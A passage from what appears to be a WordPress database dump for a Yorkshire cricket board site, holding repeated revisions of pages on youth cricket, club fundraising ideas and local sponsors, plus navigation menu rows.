Hawke</a>.\r\n\r\nWith the advent of summer rugby, with football overlapping summer, computer games, satellite TV and newer school sports such as badminton, squash, golf, athletics and swimming all competing for spare time, cricket is not the automatic choice.\r\n\r\n<a href=\"https://yorkshireccc.com/cricketcentre\" target=\"_blank\">Yorkshire Cricket Centre</a> at Headingley is generally fully utilized for evening practices in addition to young people attending cricket courses.\r\n<h3><strong>Schools</strong></h3>\r\nMany state schools now cannot afford or find the staff for cricket. Yorkshire Schools Cricket Association runs sides from Under-11 up to Under-15 - which are generally regarded as some of the best school sides in the country.\r\n<h3><strong>Clubs</strong></h3>\r\nWith fewer and fewer schools now playing cricket, the onus is now more on the Clubs to develop young players, and most clubs in Yorkshire now run teams from Under 12-13 to Under 17-18 level.\r\n\r\nIt is to the clubs\' advantage to get more young people interested in playing as their own sides are likely to get better. Yorkshire Cricket Association runs Under-16 and Under-19 teams in inter-county competitions, and Yorkshire are usually among the leaders.\r\n\r\n<strong><a href=\"http://www.telegraph.co.uk/education/educationnews/7741031/Only-a-third-of-schools-offer-cricket.html\" target=\"_blank\">Read more</a>: Only a third of schools offer cricket as a sport</strong>\r\n<h3><strong>The Academy</strong></h3>\r\nYorkshire Cricket Academy was opened in 1988 at Park Avenue ground, Bradford, before moving to the Cricket Centre at Headingley. Watch over the last 150 years of Yorkshire\'s cricket club <a href=\"http://www.thetelegraphandargus.co.uk/tahistory/featuresnostalgiapasttimes/10149205.150_momentous_years_of_Yorkshire_County_Cricket_Club/\" target=\"_blank\">here</a>.','What Does The Future Hold?','','inherit','closed','closed','','1-revision-v1','','','2016-12-16 15:24:11','2016-12-16 15:24:11','',1,'https://yorkshirecricketboard.org.uk/1-revision-v1',0,'revision','',0),(25,1,'2016-12-16 15:28:23','2016-12-16 15:28:23','','Home','','publish','closed','closed','','home','','','2019-02-12 09:24:29','2019-02-12 09:24:29','',0,'https://yorkshirecricketboard.org.uk/home',1,'nav_menu_item','',0),(26,1,'2016-12-16 15:28:23','2016-12-16 15:28:23','','Contact','','publish','closed','closed','','contact','','','2019-02-12 09:24:29','2019-02-12 09:24:29','',0,'https://yorkshirecricketboard.org.uk/contact',9,'nav_menu_item','',0),(27,1,'2016-12-16 15:28:24','2016-12-16 15:28:24','','Honours','','publish','closed','closed','','honours','','','2019-02-12 09:24:29','2019-02-12 09:24:29','',0,'https://yorkshirecricketboard.org.uk/honours',2,'nav_menu_item','',0),(28,1,'2016-12-16 15:28:24','2016-12-16 15:28:24','','History','','publish','closed','closed','','history','','','2019-02-12 09:24:29','2019-02-12 09:24:29','',0,'https://yorkshirecricketboard.org.uk/history',3,'nav_menu_item','',0),(29,1,'2016-12-16 15:28:24','2016-12-16 15:28:24','','Grounds','','publish','closed','closed','','grounds','','','2019-02-12 09:24:29','2019-02-12 09:24:29','',0,'https://yorkshirecricketboard.org.uk/grounds',4,'nav_menu_item','',0),(30,1,'2016-12-16 15:28:24','2016-12-16 15:28:24','','The Future','','publish','closed','closed','','the-future','','','2019-02-12 09:24:29','2019-02-12 09:24:29','',0,'https://yorkshirecricketboard.org.uk/the-future',5,'nav_menu_item','',0),(32,1,'2017-07-03 14:10:27','2017-07-03 14:10:27','<h3 style=\"text-align: left;\">How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-17 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/cricket-honours-300x233.jpg\" alt=\"\" width=\"300\" height=\"233\" /></a>Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events.</p>\r\n<p style=\"text-align: left;\">Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps!</p>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n\r\n<h3 style=\"text-align: left;\"><strong>Here are some popular ways to raise funds:</strong></h3>\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h2>Local Businesses Support Cricket in Yorkshire</h2>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/rockets\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"http://www.stuartpease.co.uk/fibre-glass-mouldings.html\" target=\"_blank\">Stuart Pease Fibreglass UK</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://yorkshiresport.org.uk/\" target=\"_blank\">Yorkshire Sport</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','publish','closed','closed','','local-businesses-sponsor-cricket-team','','','2017-10-03 10:21:18','2017-10-03 10:21:18','',0,'https://yorkshirecricketboard.org.uk/?page_id=32',0,'page','',0),(33,1,'2017-07-03 14:10:27','2017-07-03 14:10:27','','Local Businesses Sponsor Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 14:10:27','2017-07-03 14:10:27','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(34,1,'2017-10-03 10:18:32','2017-10-03 10:18:32','<h3 style=\"text-align: left;\">How Can Clubs Make Money?</h3>\n<p style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-17 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/cricket-honours-300x233.jpg\" alt=\"\" width=\"300\" height=\"233\" /></a>Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events.</p>\n<p style=\"text-align: left;\">Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps!</p>\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\n\n<h3 style=\"text-align: left;\"><strong>Here are some popular ways to raise funds:</strong></h3>\n<ol>\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\n</ol>\n<h2>Local Businesses Support Cricket in Yorkshire</h2>\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\n\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\n</em>\n\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\n<ul>\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\n 	<li><a href=\"https://www.fireworksshop.uk.com/rockets\" target=\"_blank\">The Fireworks Shop</a></li>\n 	<li>Stuart Pease</li>\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\n</ul>\n<blockquote>\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-autosave-v1','','','2017-10-03 10:18:32','2017-10-03 10:18:32','',32,'https://yorkshirecricketboard.org.uk/32-autosave-v1',0,'revision','',0),(35,1,'2017-07-03 14:20:11','2017-07-03 14:20:11','Declining income is a problem throughout the game, not just in Yorkshire.\r\n\r\nThe business and marketing side is now almost as important as the playing. Clubs could not survive without the revenue from advertising and sponsorship and the grant from the England and Wales Board.\r\n\r\nThis is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nRead more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.','Local Businesses Sponsor Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 14:20:11','2017-07-03 14:20:11','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(36,1,'2017-07-03 14:20:28','2017-07-03 14:20:28','Declining income is a problem throughout the game, not just in Yorkshire.\r\n\r\nThe business and marketing side is now almost as important as the playing. Clubs could not survive without the revenue from advertising and sponsorship and the grant from the England and Wales Board.\r\n\r\nThis is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nRead more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.','Local Businesses Sponsor Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 14:20:28','2017-07-03 14:20:28','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(37,1,'2017-07-03 14:38:40','2017-07-03 14:38:40','Declining income is a problem throughout the game, not just in Yorkshire.\r\n\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\nThis is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nRead more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.','Local Businesses Sponsor Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 14:38:40','2017-07-03 14:38:40','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(38,1,'2017-07-03 14:50:18','2017-07-03 14:50:18','Declining income is a problem throughout the game, not just in Yorkshire.\r\n\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\nThis is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.\r\n\r\nOther Businesses who are interested in our Cricket Team include the following:\r\n\r\n&nbsp;\r\n\r\nRead more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.','Local Businesses Get Behind Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 14:50:18','2017-07-03 14:50:18','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(39,1,'2017-07-03 14:52:06','2017-07-03 14:52:06','Declining income is a problem throughout the game, not just in Yorkshire.\r\n\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in our Cricket Team include the following:\r\n<ul>\r\n 	<li></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n</ul>\r\n&nbsp;\r\n\r\nRead more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n\r\nIf you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a>','Local Businesses Get Behind Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 14:52:06','2017-07-03 14:52:06','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(40,1,'2017-07-03 15:03:26','2017-07-03 15:03:26','<h3>Keeping Our Cricket Team Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in our Cricket Team include the following:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n</ul>\r\n&nbsp;\r\n<blockquote>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n<p style=\"text-align: left;\">If you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:03:26','2017-07-03 15:03:26','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(41,1,'2017-07-03 15:04:01','2017-07-03 15:04:01','<h3>Keeping Our Cricket Team Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in our Cricket Team include the following:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n</ul>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:04:01','2017-07-03 15:04:01','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(42,1,'2017-07-03 15:09:15','2017-07-03 15:09:15','<h3>Keeping Our Cricket Team Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in our Cricket Team include the following:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n</ul>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:09:15','2017-07-03 15:09:15','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(43,1,'2017-07-03 15:12:34','2017-07-03 15:12:34','','team-of-cricketers','','inherit','open','closed','','team-of-cricketers','','','2017-07-03 15:12:34','2017-07-03 15:12:34','',32,'https://yorkshirecricketboard.org.uk/wp-content/uploads/2017/07/team-of-cricketers.jpg',0,'attachment','image/jpeg',0),(44,1,'2017-07-03 15:12:48','2017-07-03 15:12:48','<h3>Keeping Our Cricket Team Going</h3>\r\n<img class=\"size-medium wp-image-43 alignright\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2017/07/team-of-cricketers-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" />The business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in our Cricket Team include the following:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n</ul>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:12:48','2017-07-03 15:12:48','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(45,1,'2017-07-03 15:13:29','2017-07-03 15:13:29','<h3>Keeping Our Cricket Team Going</h3>\r\n<img class=\"size-medium wp-image-14 alignright\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" />The business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in our Cricket Team include the following:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n</ul>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:13:29','2017-07-03 15:13:29','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(46,1,'2017-07-03 15:14:11','2017-07-03 15:14:11','<h3><img class=\"size-medium wp-image-14 alignright\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" />Keeping Our Cricket Team Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in our Cricket Team include the following:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n</ul>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:14:11','2017-07-03 15:14:11','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(47,1,'2017-07-03 15:15:09','2017-07-03 15:15:09','<h3><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>Keeping Our Cricket Team Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why we are more grateful than ever for our sponsors who keep our team going thanks to their generosity.</em>\r\n\r\nOther Businesses who are interested in our Cricket Team include the following:\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n</ul>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\">Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.</p>\r\n\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting our Cricket Team, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Cricket Team','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:15:09','2017-07-03 15:15:09','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(48,1,'2017-07-03 15:16:16','2017-07-03 15:16:16',' ','','','publish','closed','closed','','48','','','2019-02-12 09:24:29','2019-02-12 09:24:29','',0,'https://yorkshirecricketboard.org.uk/?p=48',6,'nav_menu_item','',0),(49,1,'2017-07-03 15:18:02','2017-07-03 15:18:02','<h3><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" 